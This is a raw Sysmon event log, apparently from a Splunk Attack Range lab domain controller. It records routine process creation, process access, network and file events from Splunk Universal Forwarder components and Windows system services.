Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E08198AC4EED3AE115035DF7188705D,SHA256=6FDBE76C58F191AFABEAB7A7AFDDAB4274C50BD14CA42E74CDFAD8AC90A66E2C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243697Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:49.909{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local52179- 23542300x80000000000000002243699Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:01.904{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD856F636D4114AF0E5B344A856F4DFE,SHA256=5374742C565D4C787A1E1D4BE842CC0EACEDCCCB198991FA8BD03E8E0B075AD2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243709Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:02.975{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6E22-603E-EEAA-00000000AD01}14524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243708Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:02.975{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243707Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:02.975{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243706Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:02.975{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243705Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:02.975{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243704Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:02.975{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6E22-603E-EEAA-00000000AD01}14524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243703Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:02.975{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6E22-603E-EEAA-00000000AD01}14524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002243702Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:02.968{05ADC7E1-6E22-603E-EEAA-00000000AD01}14524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002243701Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:02.920{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5960C8B29464339ECD8D1B053E1311CA,SHA256=BC5B3706EBB86137ED54DE1B74648B175AFAC56C3111125FBCF750A8191EFEFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243700Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:02.795{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DC0349795F146D83D8BC7CD529751404,SHA256=C3285F362103032029DDE587C23FE7F48DA2BCB967DAE1A71ADC5C622BCCD5E5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243719Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:03.639{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6E23-603E-EFAA-00000000AD01}7924C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243718Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:03.639{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243717Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:03.639{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243716Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:03.639{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243715Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:03.639{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243714Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:03.639{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6E23-603E-EFAA-00000000AD01}7924C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243713Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:03.639{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6E23-603E-EFAA-00000000AD01}7924C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002243712Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:03.640{05ADC7E1-6E23-603E-EFAA-00000000AD01}7924C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002243711Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:03.607{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=ED38F16181532500DA8D60B240741FE5,SHA256=91FAE12D14F1C0A7A52B5B3F5309E6D6D0FA973B67FF55D3936DAF4BE840D61D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243710Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:03.154{05ADC7E1-6E22-603E-EEAA-00000000AD01}145244028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000002243742Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:54.285{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60178-false10.0.1.12-8000- 10341000x80000000000000002243741Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:04.795{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6E24-603E-F1AA-00000000AD01}14212C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243740Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:04.795{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243739Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:04.795{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243738Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:04.795{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243737Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:04.795{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243736Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:04.795{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6E24-603E-F1AA-00000000AD01}14212C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243735Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:04.795{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6E24-603E-F1AA-00000000AD01}14212C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002243734Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:04.797{05ADC7E1-6E24-603E-F1AA-00000000AD01}14212C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 